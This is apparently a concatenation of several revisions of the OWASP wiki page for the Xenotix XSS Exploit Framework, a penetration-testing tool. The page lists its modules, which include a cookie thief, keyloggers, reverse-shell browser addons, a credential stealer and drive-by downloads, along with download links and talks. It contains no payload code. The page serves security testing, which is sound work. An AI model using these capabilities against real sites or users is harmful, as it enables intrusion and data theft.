| align="center" valign="top" width="50%" rowspan="2"| [[File:Owasp-incubator-trans-85.png|link=https://www.owasp.org/index.php/OWASP_Project_Stages#tab=Incubator_Projects]]
| align="center" valign="top" width="50%"| [[File:Owasp-builders-small.png|link=]]
|-
| align="center" valign="top" width="50%"| [[File:Owasp-breakers-small.png|link=]]
|-
| colspan="2" align="center" | [[File:Cc-button-y-sa-small.png|link=http://creativecommons.org/licenses/by-sa/3.0/]]
|-
| colspan="2" align="center" | [[File:Project_Type_Files_CODE.jpg|link=]]
|}

|}

= Features =

<div style="font-size:120%;border:none;margin: 0;color:#000">

'''SCANNER MODULES'''

*GET Request Manual Mode
*GET Request Auto Mode
*Multiple Parameter Scanner
*GET Request Fuzzer
*POST Request Fuzzer
*Advanced Request Fuzzer
*OAuth 1.0a Request Scanner
*DOM Scanner
*Hidden Parameter Detector

'''INFORMATION GATHERING MODULES'''

*WAF Fingerprinting
*Victim Fingerprinting
**IP to Location
**IP to GeoLocation
*Network
**Network IP (WebRTC)
**Ping Scan
**Port Scan
**Internal Network Scan
*Browser
**Fingerprinting
**Features Detector

'''EXPLOITATION MODULES'''

*Send Message
*Cookie Thief
*Keylogger
*HTML5 DDoSer
*Load File
*Grab Page Screenshot
*JavaScript Shell
*Reverse HTTP WebShell
*Metasploit Browser Exploit
*Social Engineering
**Phisher
**Tabnabbing
**Live WebCam Screenshot
**Download Spoofer
**Geolocation HTML5 API
**Java Applet Drive-By (Windows)
**Java Applet Drive-By Reverse Shell (Windows)
**HTA Network Configuration (Windows, IE)
**HTA Drive-By (Windows, IE)
**HTA Drive-By Reverse Shell (Windows, IE)
*Firefox Addons
**Reverse TCP Shell Addon (Windows, Persistent)
**Reverse TCP Shell Addon (Linux, Persistent)
**Session Stealer Addon (Persistent)
**Keylogger Addon (Persistent)
**DDoSer Addon (Persistent)
**Linux Credential File Stealer Addon (Persistent)
**Drop and Execute Addon (Persistent)

'''AUXILIARY MODULES'''
*WebKit Developer Tools
*Encoder/Decoder
*JavaScript Encoders
**JSFuck 6 Char Encoder
**jjencode Encoder
**aaencode Encoder
*JavaScript Beautifier
*Hash Calculator
*Hash Detector
*View Injected JavaScript
*View XSS Payloads

'''XENOTIX SCRIPTING ENGINE'''
* Xenotix API
* IronPython Scripting Support
* Trident and Gecko Web Engine Support

</div>

= Conference Talks =

<div style="font-size:120%;border:none;margin: 0;color:#000">

''' NULLCON GOA 2013 '''

{{#ev:youtube|J1phYXmLX8w}}

''' CLUBHACK 2012 '''

{{#ev:youtube|NYZLP0q7-y4}}

</div>

= Screenshots =

{|
|-
|
[[Image:POST_SCANNER.png|500px|thumb|right|Xenotix POST Request Scanner]]
|
[[Image:XENOTIX INFO.png|500px|thumb|left|Xenotix Information Gathering Modules]]
|-
|
[[Image:XENOTIX EXPLOITATION.png|thumb|500px|right|Xenotix Exploitation Modules]]
|
[[Image:Scripting.png|thumb|500px|left|Xenotix Scripting Engine]]
|}

=Downloads=

<div style="font-size:120%;border:none;margin: 0;color:#000">

====IMPORTANT====
Antivirus Solutions may detect it as a threat. However it is due to the features in the exploitation framework.

====Latest Release====

[[Image:Dwd.png | 200px | link=http://opensecurity.in/downloads/OWASP_Xenotix_XSS_Exploit_Framework_V6.rar]]
* Mirror [https://drive.google.com/file/d/0B_Ci-1YbMqshYzBZZ0l1MTdOcUE/view?usp=sharing Download V6 From GDrive]
MD5: bcfc69de2e16b59cf7e1df6aa3fb153f
* Download V5 http://opensecurity.in/downloads/OWASP_Xenotix_XSS_Exploit_Framework_V5.rar
MD5: bdfce2d4af4012ecc20b86bed876a54a

====Requirements====
* Microsoft .NET Framework 4.0 http://www.microsoft.com/en-in/download/details.aspx?id=17718
* IronPython 2.7.3 http://ironpython.codeplex.com/downloads/get/423690
====Older Versions====
*Version 4.5 http://opensecurity.in/downloads/Xenotix_XSS_Exploit_Framework_v4.5.rar
*Version 4 https://www.dropbox.com/s/ookdse6pyszh736/Xenotix%20XSS%20Exploit%20Framework%20V4.rar
*Version 3 https://www.owasp.org/index.php/File:OWASP_Xenotix_XSS_Exploit_Framework_v3_2013.zip
*Version 2 https://www.owasp.org/index.php/File:Xenotix_XSS_Exploit_Framework_2013_v2.zip
*Version 1 https://www.owasp.org/index.php/File:Xenotix_XSS_Exploitation_Framework.zip
====Source====
* GitHub https://github.com/ajinabraham/OWASP-Xenotix-XSS-Exploit-Framework/
</div>
= Documentation =

<div style="font-size:120%;border:none;margin: 0;color:#000">

'''Version 5 Videos'''

{{#ev:youtube|loZSdedJnqc}}

'''Version 4.5 Videos'''

{{#ev:youtube|jm1-_nTlhzY}}

'''Version 4 Videos'''

{{#ev:youtube|dCo5BCJWOdA}}

'''Version 3 Videos'''

{{#ev:youtube|CJEgO4_kd-8}}
{{#ev:youtube|owfF9C_Xerw}}
{{#ev:youtube|i8c3kf4t6A8}}
{{#ev:youtube|IT-8IH3yRrA}}
{{#ev:youtube|cgLGgVWvi9Y}}

</div>

= Roadmap =

<div style="font-size:120%;border:none;margin: 0;color:#000">
''' WHAT'S NEW! '''

{{#ev:youtube|RhGVuus_NJw}}
==V6 Changes==

* Intelli Fuzzer
* Context Based Fuzzer
* Blind Fuzzer
* HTA Network Configuration
* HTA Drive-By
* HTA Drive-By Reverse Shell
* JSFuck 6 Char Encoder
* jjencode Encoder
* aaencode Encoder
* IP to Location
* IP to GeoLocation
* IP Hinting
* Download Spoofer
* HTML5 Geolocation API
* Reverse TCP Shell Addon (Linux)
* OAuth 1.0a Request Scanner
* 4800+ Payloads
* SSL Error Fixed

==V5 Changes==
* Xenotix Scripting Engine
* Xenotix API
* V4.5 Bug Fixes
* GET Network IP (Information Gathering)
* QR Code Generator for Xenotix xook
* HTML5 WebCam Screenshot(Exploitation Module)
* HTML5 Get Page Screenshot (Exploitation Module)
* Find Feature in View Source.
* Improved Payload Count to 1630
* Name Changes

==V4.5 Changes==

* JavaScript Beautifier
* Pause and Resume support for Scan
* Jump to Payload
* Cookie Support for POST Request
* Cookie Support and Custom Headers for Header Scanner
* Added TRACE method Support
* Improved Interface
* Better Proxy Support
* WAF Fingerprinting
* Load Files <exploitation module>
* Hash Calculator
* Hash Detector
</div>

= XSS Protection Cheat Sheet =

[[Image:Xss_protection.png|center]]

The Ultimate XSS Protection Cheat Sheet for Developers is a compilation of information available on XSS Protection from various organization, researchers, websites, and from our own experience.
This document follows a simple language and justifying explanations that helps a developer to implement the correct XSS defense and to build a secure web application that prevents XSS vulnerability and Post XSS attacks. It will also discuss about the existing methods or functions provided by various programming languages to mitigate XSS vulnerability. This document will be updated regularly in order to include updated and correct in information in the domain of XSS Protection.

VIEW: [https://docs.google.com/viewer?srcid=0B_Ci-1YbMqshWUtlaGRyLVBVd28&pid=explorer&efh=false&a=v&chrome=false&embedded=true THE ULTIMATE XSS PROTECTION CHEAT SHEET FOR DEVELOPERS]

= Get Involved =

<div style="font-size:120%;border:none;margin: 0;color:#000">

Involvement in the development of Xenotix is highly encouraged!

Here are some of the ways you can help:

==Support Us==

*Facebook Page: [https://www.facebook.com/xenotix Xenotix on Facebook]
*Official Page: [[http://www.opensecurity.in/owasp-xenotix-xss-exploit-framework-v4-2013 Xenotix @ OpenSecurity]]

==Feedback & Queries==

* Do you have any issues with it?
* Do you find any design flows or errors?
* Do you need help in using it?
* Do you have something to tell about it?

Then please use this form: https://docs.google.com/forms/d/1RpUhQvuHGvPTl7Gi-EXzecidGvJwKpsRaY9-MeXm1ro/viewform

==Development==

Are you a developer? Do you have some cool ideas to contribute? Get in touch via '''ajin [DOT] abraham [AT] owasp.org'''
If you actively contribute to Xenotix then you will be invited to join the project.

</div>

__NOTOC__ <headertabs />

[[Category:OWASP Project]] [[Category:OWASP_Breakers]] [[Category:OWASP_Defenders]]
[[Category:OWASP_Project|Xenotix XSS Exploit Framework Project]] [[Category:OWASP_Tool]] [[Category:OWASP_Release_Quality_Tool|OWASP Release Quality Tool]] [[Category:OWASP_Download]]

OWASP Xenotix XSS Exploit Framework

2014-10-15T06:20:18Z

Ajin Abraham: Version 5 Download link correction

=Main=

<div style="width:100%;height:160px;border:0,margin:0;overflow: hidden;">[[File:OWASP_Project_Header.jpg|link=]]</div>

{| style="padding: 0;margin:0;margin-top:10px;text-align:left;" |-
| valign="top" style="border-right: 1px dotted gray;padding-right:20px;" |

==OWASP Xenotix XSS Exploit Framework 6==

[[Image:Xen6.png|left|550px]]
'''OWASP Xenotix XSS Exploit Framework''' is an advanced Cross Site Scripting (XSS) vulnerability detection and exploitation framework. Xenotix provides Zero False Positive XSS Detection by performing the Scan within the browser engines where in real world, payloads get reflected. Xenotix Scanner Module is incorporated with 3 intelligent fuzzers to reduce the scan time and produce better results. If you really don't like the tool logic, then leverage the power of Xenotix API to make the tool work like you wanted it to be.
It is claimed to have the world’s 2nd largest XSS Payloads of about 4800+ distinctive XSS Payloads. It is incorporated with a feature rich Information Gathering module for target Reconnaissance. The Exploit Framework includes real world offensive XSS exploitation modules for Penetration Testing and Proof of Concept creation.

<paypal>OWASP Xenotix XSS Exploit Framework</paypal>

== LICENSING ==
OWASP Xenotix XSS Exploit Framework is free to use. It is licensed under the http://creativecommons.org/licenses/by-sa/3.0/ Creative Commons Attribution-ShareAlike 3.0 license], so you can copy, distribute and transmit the work, and you can adapt it, and use it commercially, but all provided that you attribute the work and if you alter, transform, or build upon this work, you may distribute the resulting work only under the same or similar license to this one.

| valign="top" style="padding-left:25px;width:175px;border-right: 1px dotted gray;padding-right:25px;" |

== PRESENTATIONS ==

'''DEFCON DCG Banglore 2013'''
*Presentation: [http://www.slideshare.net/ajin25/pwning-with-xss-from-alert-to-reverse-shell-defcon-banglore-2013 OWASP Xenotix XSS Exploit Framework v4 ]

'''BlackHat Europe Arsenal 2013'''
*Presentation: [https://www.dropbox.com/s/o8adyvtngbszq32/blackhat.zip OWASP Xenotix XSS Exploit Framework v3 ]

'''Nulcon Goa 2013'''
*Presentation: [http://www.slideshare.net/ajin25/owasp-xenotix-xss-exploit-framework-v3-nullcon-goa-2013 OWASP Xenotix XSS Exploit Framework v3 ]
'''ClubHack 2012'''
*Presentation: [http://www.slideshare.net/ajin25/xenotix-xss-exploit-framework-clubhack-2012 OWASP Xenotix XSS Exploit Framework v2]

== PROJECT LEADER ==

Ajin Abraham | [https://twitter.com/ajinabraham @ajinabraham]

== AWARDS ==

[[Image:ToolsWatch.png‎ |180px | thumb | left |link=http://www.toolswatch.org/2013/12/2013-top-security-tools-as-voted-by-toolswatch-org-readers/ | Top 5th Security Tool of 2013]]
[[Image:CSPF.jpg |180px | thumb | left | Recommended by CSPF]]

| valign="top" style="padding-left:25px;width:175px;" |

== QUICK DOWNLOAD ==

[[Image:Dwd.png |200px| link=http://opensecurity.in/downloads/OWASP_Xenotix_XSS_Exploit_Framework_V6.rar]]

== NEWS AND EVENTS ==
* [14 Sept 2014] Xenotix XSS Exploit Framework V6 is Released
* [14 Feb 2014] Xenotix XSS Exploit Framework V5 is Released
* [16 Dec 2013] [http://www.toolswatch.org/2013/12/2013-top-security-tools-as-voted-by-toolswatch-org-readers/ Top 5th Security tool of 2013, voted by ToolsWatch Readers]
* [10 Nov 2013] [http://holisticinfosec.org/toolsmith/pdf/november2013.pdf OWASP Xenotix in ISSA Journal]
* [01 Nov 2013] [http://holisticinfosec.blogspot.in/2013/11/toolsmith-owasp-xenotix-xss-exploit.html Toolsmith Tool of the Month]

== RELATED PROJECTS ==

* [[OWASP_Xelenium_Project]]
* [[ZAP]]
* [[OWASP_XSSER]]

== Ohloh ==

*https://www.ohloh.net/p/OWASP-Xenotix-XSS-Exploit-Framework

== CLASSIFICATIONS ==

{| width="200" cellpadding="2"
|-
| align="center" valign="top" width="50%" rowspan="2"| [[File:Owasp-incubator-trans-85.png|link=https://www.owasp.org/index.php/OWASP_Project_Stages#tab=Incubator_Projects]]
| align="center" valign="top" width="50%"| [[File:Owasp-builders-small.png|link=]]
|-
| align="center" valign="top" width="50%"| [[File:Owasp-breakers-small.png|link=]]
|-
| colspan="2" align="center" | [[File:Cc-button-y-sa-small.png|link=http://creativecommons.org/licenses/by-sa/3.0/]]
|-
| colspan="2" align="center" | [[File:Project_Type_Files_CODE.jpg|link=]]
|}

|}

= Features =

<div style="font-size:120%;border:none;margin: 0;color:#000">

'''SCANNER MODULES'''

*GET Request Manual Mode
*GET Request Auto Mode
*Multiple Parameter Scanner
*GET Request Fuzzer
*POST Request Fuzzer
*Advanced Request Fuzzer
*OAuth 1.0a Request Scanner
*DOM Scanner
*Hidden Parameter Detector

'''INFORMATION GATHERING MODULES'''

*WAF Fingerprinting
*Victim Fingerprinting
**IP to Location
**IP to GeoLocation
*Network
**Network IP (WebRTC)
**Ping Scan
**Port Scan
**Internal Network Scan
*Browser
**Fingerprinting
**Features Detector

'''EXPLOITATION MODULES'''

*Send Message
*Cookie Thief
*Keylogger
*HTML5 DDoSer
*Load File
*Grab Page Screenshot
*JavaScript Shell
*Reverse HTTP WebShell
*Metasploit Browser Exploit
*Social Engineering
**Phisher
**Tabnabbing
**Live WebCam Screenshot
**Download Spoofer
**Geolocation HTML5 API
**Java Applet Drive-By (Windows)
**Java Applet Drive-By Reverse Shell (Windows)
**HTA Network Configuration (Windows, IE)
**HTA Drive-By (Windows, IE)
**HTA Drive-By Reverse Shell (Windows, IE)
*Firefox Addons
**Reverse TCP Shell Addon (Windows, Persistent)
**Reverse TCP Shell Addon (Linux, Persistent)
**Session Stealer Addon (Persistent)
**Keylogger Addon (Persistent)
**DDoSer Addon (Persistent)
**Linux Credential File Stealer Addon (Persistent)
**Drop and Execute Addon (Persistent)

'''AUXILIARY MODULES'''
*WebKit Developer Tools
*Encoder/Decoder
*JavaScript Encoders
**JSFuck 6 Char Encoder
**jjencode Encoder
**aaencode Encoder
*JavaScript Beautifier
*Hash Calculator
*Hash Detector
*View Injected JavaScript
*View XSS Payloads

'''XENOTIX SCRIPTING ENGINE'''
* Xenotix API
* IronPython Scripting Support
* Trident and Gecko Web Engine Support

</div>

= Conference Talks =

<div style="font-size:120%;border:none;margin: 0;color:#000">

''' NULLCON GOA 2013 '''

{{#ev:youtube|J1phYXmLX8w}}

''' CLUBHACK 2012 '''

{{#ev:youtube|NYZLP0q7-y4}}

</div>

= Screenshots =

{|
|-
|
[[Image:POST_SCANNER.png|500px|thumb|right|Xenotix POST Request Scanner]]
|
[[Image:XENOTIX INFO.png|500px|thumb|left|Xenotix Information Gathering Modules]]
|-
|
[[Image:XENOTIX EXPLOITATION.png|thumb|500px|right|Xenotix Exploitation Modules]]
|
[[Image:Scripting.png|thumb|500px|left|Xenotix Scripting Engine]]
|}

=Downloads=

<div style="font-size:120%;border:none;margin: 0;color:#000">

====IMPORTANT====
Antivirus Solutions may detect it as a threat. However it is due to the features in the exploitation framework.

====Latest Release====

[[Image:Dwd.png | 200px | link=http://opensecurity.in/downloads/OWASP_Xenotix_XSS_Exploit_Framework_V6.rar]]
* Mirror https://drive.google.com/file/d/0B_Ci-1YbMqshYzBZZ0l1MTdOcUE/view?usp=sharing
MD5: bcfc69de2e16b59cf7e1df6aa3fb153f
* Download V5 http://opensecurity.in/downloads/OWASP_Xenotix_XSS_Exploit_Framework_V5.rar
MD5: bdfce2d4af4012ecc20b86bed876a54a

====Requirements====
* Microsoft .NET Framework 4.0 http://www.microsoft.com/en-in/download/details.aspx?id=17718
* IronPython 2.7.3 http://ironpython.codeplex.com/downloads/get/423690
====Older Versions====
*Version 4.5 http://opensecurity.in/downloads/Xenotix_XSS_Exploit_Framework_v4.5.rar
*Version 4 https://www.dropbox.com/s/ookdse6pyszh736/Xenotix%20XSS%20Exploit%20Framework%20V4.rar
*Version 3 https://www.owasp.org/index.php/File:OWASP_Xenotix_XSS_Exploit_Framework_v3_2013.zip
*Version 2 https://www.owasp.org/index.php/File:Xenotix_XSS_Exploit_Framework_2013_v2.zip
*Version 1 https://www.owasp.org/index.php/File:Xenotix_XSS_Exploitation_Framework.zip
====Source====
* GitHub https://github.com/ajinabraham/OWASP-Xenotix-XSS-Exploit-Framework/
</div>
= Documentation =

<div style="font-size:120%;border:none;margin: 0;color:#000">

'''Version 5 Videos'''

{{#ev:youtube|loZSdedJnqc}}

'''Version 4.5 Videos'''

{{#ev:youtube|jm1-_nTlhzY}}

'''Version 4 Videos'''

{{#ev:youtube|dCo5BCJWOdA}}

'''Version 3 Videos'''

{{#ev:youtube|CJEgO4_kd-8}}
{{#ev:youtube|owfF9C_Xerw}}
{{#ev:youtube|i8c3kf4t6A8}}
{{#ev:youtube|IT-8IH3yRrA}}
{{#ev:youtube|cgLGgVWvi9Y}}

</div>

= Roadmap =

<div style="font-size:120%;border:none;margin: 0;color:#000">
''' WHAT'S NEW! '''

{{#ev:youtube|RhGVuus_NJw}}
==V6 Changes==

* Intelli Fuzzer
* Context Based Fuzzer
* Blind Fuzzer
* HTA Network Configuration
* HTA Drive-By
* HTA Drive-By Reverse Shell
* JSFuck 6 Char Encoder
* jjencode Encoder
* aaencode Encoder
* IP to Location
* IP to GeoLocation
* IP Hinting
* Download Spoofer
* HTML5 Geolocation API
* Reverse TCP Shell Addon (Linux)
* OAuth 1.0a Request Scanner
* 4800+ Payloads
* SSL Error Fixed

==V5 Changes==
* Xenotix Scripting Engine
* Xenotix API
* V4.5 Bug Fixes
* GET Network IP (Information Gathering)
* QR Code Generator for Xenotix xook
* HTML5 WebCam Screenshot(Exploitation Module)
* HTML5 Get Page Screenshot (Exploitation Module)
* Find Feature in View Source.
* Improved Payload Count to 1630
* Name Changes

==V4.5 Changes==

* JavaScript Beautifier
* Pause and Resume support for Scan
* Jump to Payload
* Cookie Support for POST Request
* Cookie Support and Custom Headers for Header Scanner
* Added TRACE method Support
* Improved Interface
* Better Proxy Support
* WAF Fingerprinting
* Load Files <exploitation module>
* Hash Calculator
* Hash Detector
</div>

= XSS Protection Cheat Sheet =

[[Image:Xss_protection.png|center]]

The Ultimate XSS Protection Cheat Sheet for Developers is a compilation of information available on XSS Protection from various organization, researchers, websites, and from our own experience.
This document follows a simple language and justifying explanations that helps a developer to implement the correct XSS defense and to build a secure web application that prevents XSS vulnerability and Post XSS attacks. It will also discuss about the existing methods or functions provided by various programming languages to mitigate XSS vulnerability. This document will be updated regularly in order to include updated and correct in information in the domain of XSS Protection.

VIEW: [https://docs.google.com/viewer?srcid=0B_Ci-1YbMqshWUtlaGRyLVBVd28&pid=explorer&efh=false&a=v&chrome=false&embedded=true THE ULTIMATE XSS PROTECTION CHEAT SHEET FOR DEVELOPERS]

= Get Involved =

<div style="font-size:120%;border:none;margin: 0;color:#000">

Involvement in the development of Xenotix is highly encouraged!

Here are some of the ways you can help:

==Support Us==

*Facebook Page: [https://www.facebook.com/xenotix Xenotix on Facebook]
*Official Page: [[http://www.opensecurity.in/owasp-xenotix-xss-exploit-framework-v4-2013 Xenotix @ OpenSecurity]]

==Feedback & Queries==

* Do you have any issues with it?
* Do you find any design flows or errors?
* Do you need help in using it?
* Do you have something to tell about it?

Then please use this form: https://docs.google.com/forms/d/1RpUhQvuHGvPTl7Gi-EXzecidGvJwKpsRaY9-MeXm1ro/viewform

==Development==

Are you a developer? Do you have some cool ideas to contribute? Get in touch via '''ajin [DOT] abraham [AT] owasp.org'''
If you actively contribute to Xenotix then you will be invited to join the project.

</div>

__NOTOC__ <headertabs />

[[Category:OWASP Project]] [[Category:OWASP_Breakers]] [[Category:OWASP_Defenders]]
[[Category:OWASP_Project|Xenotix XSS Exploit Framework Project]] [[Category:OWASP_Tool]] [[Category:OWASP_Release_Quality_Tool|OWASP Release Quality Tool]] [[Category:OWASP_Download]]

OWASP Xenotix XSS Exploit Framework

2014-10-12T15:02:17Z

Ajin Abraham: /* Latest Release */

=Main=

<div style="width:100%;height:160px;border:0,margin:0;overflow: hidden;">[[File:OWASP_Project_Header.jpg|link=]]</div>

{| style="padding: 0;margin:0;margin-top:10px;text-align:left;" |-
| valign="top" style="border-right: 1px dotted gray;padding-right:20px;" |

==OWASP Xenotix XSS Exploit Framework 6==

[[Image:Xen6.png|left|550px]]
'''OWASP Xenotix XSS Exploit Framework''' is an advanced Cross Site Scripting (XSS) vulnerability detection and exploitation framework. Xenotix provides Zero False Positive XSS Detection by performing the Scan within the browser engines where in real world, payloads get reflected. Xenotix Scanner Module is incorporated with 3 intelligent fuzzers to reduce the scan time and produce better results. If you really don't like the tool logic, then leverage the power of Xenotix API to make the tool work like you wanted it to be.
It is claimed to have the world’s 2nd largest XSS Payloads of about 4800+ distinctive XSS Payloads. It is incorporated with a feature rich Information Gathering module for target Reconnaissance. The Exploit Framework includes real world offensive XSS exploitation modules for Penetration Testing and Proof of Concept creation.

<paypal>OWASP Xenotix XSS Exploit Framework</paypal>

== LICENSING ==
OWASP Xenotix XSS Exploit Framework is free to use. It is licensed under the http://creativecommons.org/licenses/by-sa/3.0/ Creative Commons Attribution-ShareAlike 3.0 license], so you can copy, distribute and transmit the work, and you can adapt it, and use it commercially, but all provided that you attribute the work and if you alter, transform, or build upon this work, you may distribute the resulting work only under the same or similar license to this one.

| valign="top" style="padding-left:25px;width:175px;border-right: 1px dotted gray;padding-right:25px;" |

== PRESENTATIONS ==

'''DEFCON DCG Banglore 2013'''
*Presentation: [http://www.slideshare.net/ajin25/pwning-with-xss-from-alert-to-reverse-shell-defcon-banglore-2013 OWASP Xenotix XSS Exploit Framework v4 ]

'''BlackHat Europe Arsenal 2013'''
*Presentation: [https://www.dropbox.com/s/o8adyvtngbszq32/blackhat.zip OWASP Xenotix XSS Exploit Framework v3 ]

'''Nulcon Goa 2013'''
*Presentation: [http://www.slideshare.net/ajin25/owasp-xenotix-xss-exploit-framework-v3-nullcon-goa-2013 OWASP Xenotix XSS Exploit Framework v3 ]
'''ClubHack 2012'''
*Presentation: [http://www.slideshare.net/ajin25/xenotix-xss-exploit-framework-clubhack-2012 OWASP Xenotix XSS Exploit Framework v2]

== PROJECT LEADER ==

Ajin Abraham | [https://twitter.com/ajinabraham @ajinabraham]

== AWARDS ==

[[Image:ToolsWatch.png‎ |180px | thumb | left |link=http://www.toolswatch.org/2013/12/2013-top-security-tools-as-voted-by-toolswatch-org-readers/ | Top 5th Security Tool of 2013]]
[[Image:CSPF.jpg |180px | thumb | left | Recommended by CSPF]]

| valign="top" style="padding-left:25px;width:175px;" |

== QUICK DOWNLOAD ==

[[Image:Dwd.png |200px| link=http://opensecurity.in/downloads/OWASP_Xenotix_XSS_Exploit_Framework_V6.rar]]

== NEWS AND EVENTS ==
* [14 Sept 2014] Xenotix XSS Exploit Framework V6 is Released
* [14 Feb 2014] Xenotix XSS Exploit Framework V5 is Released
* [16 Dec 2013] [http://www.toolswatch.org/2013/12/2013-top-security-tools-as-voted-by-toolswatch-org-readers/ Top 5th Security tool of 2013, voted by ToolsWatch Readers]
* [10 Nov 2013] [http://holisticinfosec.org/toolsmith/pdf/november2013.pdf OWASP Xenotix in ISSA Journal]
* [01 Nov 2013] [http://holisticinfosec.blogspot.in/2013/11/toolsmith-owasp-xenotix-xss-exploit.html Toolsmith Tool of the Month]

== RELATED PROJECTS ==

* [[OWASP_Xelenium_Project]]
* [[ZAP]]
* [[OWASP_XSSER]]

== Ohloh ==

*https://www.ohloh.net/p/OWASP-Xenotix-XSS-Exploit-Framework

== CLASSIFICATIONS ==

{| width="200" cellpadding="2"
|-
| align="center" valign="top" width="50%" rowspan="2"| [[File:Owasp-incubator-trans-85.png|link=https://www.owasp.org/index.php/OWASP_Project_Stages#tab=Incubator_Projects]]
| align="center" valign="top" width="50%"| [[File:Owasp-builders-small.png|link=]]
|-
| align="center" valign="top" width="50%"| [[File:Owasp-breakers-small.png|link=]]
|-
| colspan="2" align="center" | [[File:Cc-button-y-sa-small.png|link=http://creativecommons.org/licenses/by-sa/3.0/]]
|-
| colspan="2" align="center" | [[File:Project_Type_Files_CODE.jpg|link=]]
|}

|}

= Features =

<div style="font-size:120%;border:none;margin: 0;color:#000">

'''SCANNER MODULES'''

*GET Request Manual Mode
*GET Request Auto Mode
*Multiple Parameter Scanner
*GET Request Fuzzer
*POST Request Fuzzer
*Advanced Request Fuzzer
*OAuth 1.0a Request Scanner
*DOM Scanner
*Hidden Parameter Detector

'''INFORMATION GATHERING MODULES'''

*WAF Fingerprinting
*Victim Fingerprinting
**IP to Location
**IP to GeoLocation
*Network
**Network IP (WebRTC)
**Ping Scan
**Port Scan
**Internal Network Scan
*Browser
**Fingerprinting
**Features Detector

'''EXPLOITATION MODULES'''

*Send Message
*Cookie Thief
*Keylogger
*HTML5 DDoSer
*Load File
*Grab Page Screenshot
*JavaScript Shell
*Reverse HTTP WebShell
*Metasploit Browser Exploit
*Social Engineering
**Phisher
**Tabnabbing
**Live WebCam Screenshot
**Download Spoofer
**Geolocation HTML5 API
**Java Applet Drive-By (Windows)
**Java Applet Drive-By Reverse Shell (Windows)
**HTA Network Configuration (Windows, IE)
**HTA Drive-By (Windows, IE)
**HTA Drive-By Reverse Shell (Windows, IE)
*Firefox Addons
**Reverse TCP Shell Addon (Windows, Persistent)
**Reverse TCP Shell Addon (Linux, Persistent)
**Session Stealer Addon (Persistent)
**Keylogger Addon (Persistent)
**DDoSer Addon (Persistent)
**Linux Credential File Stealer Addon (Persistent)
**Drop and Execute Addon (Persistent)

'''AUXILIARY MODULES'''
*WebKit Developer Tools
*Encoder/Decoder
*JavaScript Encoders
**JSFuck 6 Char Encoder
**jjencode Encoder
**aaencode Encoder
*JavaScript Beautifier
*Hash Calculator
*Hash Detector
*View Injected JavaScript
*View XSS Payloads

'''XENOTIX SCRIPTING ENGINE'''
* Xenotix API
* IronPython Scripting Support
* Trident and Gecko Web Engine Support

</div>

= Conference Talks =

<div style="font-size:120%;border:none;margin: 0;color:#000">

''' NULLCON GOA 2013 '''

{{#ev:youtube|J1phYXmLX8w}}

''' CLUBHACK 2012 '''

{{#ev:youtube|NYZLP0q7-y4}}

</div>

= Screenshots =

{|
|-
|
[[Image:POST_SCANNER.png|500px|thumb|right|Xenotix POST Request Scanner]]
|
[[Image:XENOTIX INFO.png|500px|thumb|left|Xenotix Information Gathering Modules]]
|-
|
[[Image:XENOTIX EXPLOITATION.png|thumb|500px|right|Xenotix Exploitation Modules]]
|
[[Image:Scripting.png|thumb|500px|left|Xenotix Scripting Engine]]
|}

=Downloads=

<div style="font-size:120%;border:none;margin: 0;color:#000">

====IMPORTANT====
Antivirus Solutions may detect it as a threat. However it is due to the features in the exploitation framework.

====Latest Release====

[[Image:Dwd.png | 200px | link=http://opensecurity.in/downloads/OWASP_Xenotix_XSS_Exploit_Framework_V6.rar]]
* Mirror https://drive.google.com/file/d/0B_Ci-1YbMqshYzBZZ0l1MTdOcUE/view?usp=sharing
MD5: bcfc69de2e16b59cf7e1df6aa3fb153f
* Download V5 http://opensecurity.in/downloads/OWASP_Xenotix_XSS_Exploit_Framework_V6.rar
MD5: bdfce2d4af4012ecc20b86bed876a54a

====Requirements====
* Microsoft .NET Framework 4.0 http://www.microsoft.com/en-in/download/details.aspx?id=17718
* IronPython 2.7.3 http://ironpython.codeplex.com/downloads/get/423690
====Older Versions====
*Version 4.5 http://opensecurity.in/downloads/Xenotix_XSS_Exploit_Framework_v4.5.rar
*Version 4 https://www.dropbox.com/s/ookdse6pyszh736/Xenotix%20XSS%20Exploit%20Framework%20V4.rar
*Version 3 https://www.owasp.org/index.php/File:OWASP_Xenotix_XSS_Exploit_Framework_v3_2013.zip
*Version 2 https://www.owasp.org/index.php/File:Xenotix_XSS_Exploit_Framework_2013_v2.zip
*Version 1 https://www.owasp.org/index.php/File:Xenotix_XSS_Exploitation_Framework.zip
====Source====
* GitHub https://github.com/ajinabraham/OWASP-Xenotix-XSS-Exploit-Framework/
</div>
= Documentation =

<div style="font-size:120%;border:none;margin: 0;color:#000">

'''Version 5 Videos'''

{{#ev:youtube|loZSdedJnqc}}

'''Version 4.5 Videos'''

{{#ev:youtube|jm1-_nTlhzY}}

'''Version 4 Videos'''

{{#ev:youtube|dCo5BCJWOdA}}

'''Version 3 Videos'''

{{#ev:youtube|CJEgO4_kd-8}}
{{#ev:youtube|owfF9C_Xerw}}
{{#ev:youtube|i8c3kf4t6A8}}
{{#ev:youtube|IT-8IH3yRrA}}
{{#ev:youtube|cgLGgVWvi9Y}}

</div>

= Roadmap =

<div style="font-size:120%;border:none;margin: 0;color:#000">
''' WHAT'S NEW! '''

{{#ev:youtube|RhGVuus_NJw}}
==V6 Changes==

* Intelli Fuzzer
* Context Based Fuzzer
* Blind Fuzzer
* HTA Network Configuration
* HTA Drive-By
* HTA Drive-By Reverse Shell
* JSFuck 6 Char Encoder
* jjencode Encoder
* aaencode Encoder
* IP to Location
* IP to GeoLocation
* IP Hinting
* Download Spoofer
* HTML5 Geolocation API
* Reverse TCP Shell Addon (Linux)
* OAuth 1.0a Request Scanner
* 4800+ Payloads
* SSL Error Fixed

==V5 Changes==
* Xenotix Scripting Engine
* Xenotix API
* V4.5 Bug Fixes
* GET Network IP (Information Gathering)
* QR Code Generator for Xenotix xook
* HTML5 WebCam Screenshot(Exploitation Module)
* HTML5 Get Page Screenshot (Exploitation Module)
* Find Feature in View Source.
* Improved Payload Count to 1630
* Name Changes

==V4.5 Changes==

* JavaScript Beautifier
* Pause and Resume support for Scan
* Jump to Payload
* Cookie Support for POST Request
* Cookie Support and Custom Headers for Header Scanner
* Added TRACE method Support
* Improved Interface
* Better Proxy Support
* WAF Fingerprinting
* Load Files <exploitation module>
* Hash Calculator
* Hash Detector
</div>

= XSS Protection Cheat Sheet =

[[Image:Xss_protection.png|center]]

The Ultimate XSS Protection Cheat Sheet for Developers is a compilation of information available on XSS Protection from various organization, researchers, websites, and from our own experience.
